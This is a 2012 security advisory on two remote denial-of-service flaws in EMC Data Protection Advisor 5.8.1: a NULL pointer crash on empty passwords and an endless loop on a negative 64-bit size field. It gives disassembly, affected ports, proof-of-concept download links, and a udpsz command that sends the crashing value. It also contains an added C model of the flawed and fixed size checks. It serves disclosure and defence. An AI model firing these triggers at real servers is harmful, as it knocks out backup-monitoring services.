EMC Data Protection Advisor 5.8.1 - Denial of Service
EDB-ID: 18688
Platform: Hardware
Date: 2012-03-31

#######################################################################

                             Luigi Auriemma

Application:  EMC Data Protection Advisor
              http://www.emc.com/backup-and-recovery/data-protection-advisor/data-protection-advisor.htm
Versions:     <= 5.8.1
Platforms:    AIX, HP-UX, Linux, Solaris, Windows
Bugs:         A] cProcessAuthenticationData NULL pointer
              B] thread CPU 100%
Exploitation: remote
Date:         29 Mar 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From the vendor's homepage:
"EMC Data Protection Advisor: Manage service levels, reduce complexity,
and eliminate manual efforts with EMC’s powerful data protection
management software that automates monitoring, analysis, alerting, and
reporting across backup, replication, and virtual environments."


#######################################################################

=======
2) Bugs
=======

------------------------------------------
A] cProcessAuthenticationData NULL pointer
------------------------------------------

A missing password field, or an empty password, in the
AUTHENTICATECONNECTION command required to log in leads to a NULL
pointer dereference in the DPA_Utilities.cProcessAuthenticationData
function: the pointer returned by decodeString is walked by an inlined
strlen() loop without a NULL check:

  10042EA0  /$ 55             PUSH EBP
  10042EA1  |. 8BEC           MOV EBP,ESP
  10042EA3  |. 83EC 0C        SUB ESP,0C
  10042EA6  |. A1 B04F0C10    MOV EAX,DWORD PTR DS:[100C4FB0]
  10042EAB  |. 33C5           XOR EAX,EBP
  10042EAD  |. 8945 FC        MOV DWORD PTR SS:[EBP-4],EAX
  10042EB0  |. 53             PUSH EBX
  10042EB1  |. 56             PUSH ESI
  10042EB2  |. 8BF1           MOV ESI,ECX
  10042EB4  |. 57             PUSH EDI
  10042EB5  |. 56             PUSH ESI
  10042EB6  |. E8 93E3FBFF    CALL DPA_Util.decodeString
  10042EBB  |. 8BC8           MOV ECX,EAX
  10042EBD  |. 83C4 08        ADD ESP,8
  10042EC0  |. 8D59 01        LEA EBX,DWORD PTR DS:[ECX+1]
  10042EC3  |> 8A11           /MOV DL,BYTE PTR DS:[ECX]     ; strlen() NULL pointer
  10042EC5  |. 83C1 01        |ADD ECX,1
  10042EC8  |. 84D2           |TEST DL,DL
  10042ECA  |.^75 F7          \JNZ SHORT DPA_Util.10042EC3


------------------
B] thread CPU 100%
------------------

An endless loop in the DPA_Utilities library while handling the protocol
when a negative 64-bit size field is used (the size is checked with
signed comparisons, so 0xFFFFFFFFFFFFFFFF is treated as -1):

  100138FC   > 3BF1           CMP ESI,ECX
  100138FE   . 75 0C          JNZ SHORT DPA_Util.1001390C
  10013900   . 8B55 E4        MOV EDX,DWORD PTR SS:[EBP-1C]
  10013903   . 0B55 E8        OR EDX,DWORD PTR SS:[EBP-18]
  10013906   . 0F84 C1020000  JE DPA_Util.10013BCD
  1001390C   > 2975 DC        SUB DWORD PTR SS:[EBP-24],ESI
  1001390F   . 68 20870910    PUSH DPA_Util.10098720        ; "nsReadRequest"
  ...
  100137F0   > 8B7D 08        MOV EDI,DWORD PTR SS:[EBP+8]
  100137F3   > 8B75 E4        MOV ESI,DWORD PTR SS:[EBP-1C]
  100137F6   > 837D E8 00     CMP DWORD PTR SS:[EBP-18],0   ; signed comparison
  100137FA   . 7F 4A          JG SHORT DPA_Util.10013846
  100137FC   . 7C 04          JL SHORT DPA_Util.10013802
  100137FE   . 85F6           TEST ESI,ESI
  10013800   . 77 44          JA SHORT DPA_Util.10013846
  10013802   > 837D E0 00     CMP DWORD PTR SS:[EBP-20],0   ; signed comparison
  10013806   . 0F8C 0B040000  JL DPA_Util.10013C17
  1001380C   . 7F 0A          JG SHORT DPA_Util.10013818
  1001380E   . 837D DC 00     CMP DWORD PTR SS:[EBP-24],0
  10013812   . 0F86 FF030000  JBE DPA_Util.10013C17
  10013818   > BF 1B700910    MOV EDI,DPA_Util.1009701B
  1001381D   . 33F6           XOR ESI,ESI
  1001381F   > 33C9           XOR ECX,ECX
  10013821   . 894D F4        MOV DWORD PTR SS:[EBP-C],ECX
  10013824   . 894D F0        MOV DWORD PTR SS:[EBP-10],ECX
  10013827   . 390B           CMP DWORD PTR DS:[EBX],ECX
  10013829   . 894D F8        MOV DWORD PTR SS:[EBP-8],ECX
  1001382C   . 894D EC        MOV DWORD PTR SS:[EBP-14],ECX
  1001382F   . 0F84 C7000000  JE DPA_Util.100138FC

Note that this loop pins only the thread handling the malicious
connection at 100% CPU; the other connections to the affected service
keep working.
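As an added illustration (written for this page, not DPA code and not taken from the PoC), the C model below shows why a signed check on the 64-bit size field lets the value 18446744073709551615 (-1 as int64) through and leaves the read loop with no exit, beside an unsigned, capped check that rejects it up front; the frame layout, the chunk size and the max_frame limit are assumptions.

```c
/* Added example, not DPA code: models the size-field check behind bug B.
 * Assumption: the reader takes a 64-bit little-endian length from the frame,
 * then loops until that many bytes have been consumed. */
#include <stdint.h>
#include <stddef.h>

#define MAX_PASSES 1000   /* bound so the model itself cannot spin forever */

/* Constructed headers: the PoC value 18446744073709551615 and a sane 4096. */
static const unsigned char POC_HDR[8]  = {0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF};
static const unsigned char GOOD_HDR[8] = {0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00};

static uint64_t read_u64le(const unsigned char *p)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}

/* Vulnerable model: signed comparisons, as the disassembly comments note.
 * Returns the pass on which the loop finishes, -2 if the size is rejected,
 * -1 if the bound is hit (the real thread would spin at 100% CPU). */
int read_loop_signed(const unsigned char *hdr, size_t chunk, int64_t max_frame)
{
    int64_t remaining = (int64_t)read_u64le(hdr);   /* 2^64-1 becomes -1 */
    if (remaining > max_frame) return -2;            /* -1 passes this check */
    for (int pass = 1; pass <= MAX_PASSES; pass++) {
        if (remaining == 0) return pass;             /* exit: nothing left */
        if (remaining > 0)                           /* -1 is never read ... */
            remaining -= (remaining < (int64_t)chunk) ? remaining : (int64_t)chunk;
    }
    return -1;                                       /* ... so never reaches 0 */
}

/* Hardened model: treat the field as unsigned and cap it before looping. */
int read_loop_checked(const unsigned char *hdr, size_t chunk, uint64_t max_frame)
{
    uint64_t remaining = read_u64le(hdr);
    if (remaining > max_frame) return -2;            /* 2^64-1 rejected here */
    for (int pass = 1; pass <= MAX_PASSES; pass++) {
        if (remaining == 0) return pass;
        remaining -= (remaining < chunk) ? remaining : chunk;
    }
    return -1;
}
```

With a 1024-byte chunk and a 64 KiB cap, the signed model returns -1 for the PoC header and 5 for the 4096-byte one, while the checked model returns -2 and 5.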


Both bugs can be triggered in the following services:
- DPA_Controller on port 3916
- DPA_Listener   on port 4001


#######################################################################

===========
3) The Code
===========


A]
http://aluigi.org/poc/dpa_1.zip

  dpa_1 SERVER

B]
http://aluigi.org/testz/udpsz.zip

  udpsz -c "18446744073709551615/1/UNB" -T SERVER 3916 -1


#######################################################################

======
4) Fix
======


No fix.


#######################################################################